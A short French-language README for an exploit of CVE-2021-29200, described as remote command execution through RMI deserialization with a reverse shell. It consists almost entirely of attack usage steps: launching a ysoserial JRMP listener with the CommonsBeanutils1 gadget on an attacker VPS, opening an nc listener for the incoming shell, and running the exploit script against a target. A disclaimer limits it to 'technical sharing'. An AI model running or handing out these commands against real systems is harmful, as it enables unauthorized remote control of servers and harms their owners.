
Exploit pour CVE-2021-29200 permettant l'exécution de commandes à distance via une attaque par désérialisation RMI avec un écouteur JRMP et la livraison d'un payload reverse shell.
CVE-2021-29200 EXP peut réussir à obtenir un shell inversé
Cet article et cet outil sont uniquement destinés au partage technique. Toute utilisation illégale est strictement interdite, et l'utilisateur assume seul toutes les conséquences.
RMI sur le VPS sur le port 9999java -cp ysoserial.jar ysoserial.exploit.JRMPListener 9999 CommonsBeanutils1 '[commande à exécuter]'
nc sur le VPS sur le port 8443nc -lvp 8443
python3 cve-2021-29200_exp.py <cible> <ip_vps> <port_vps>
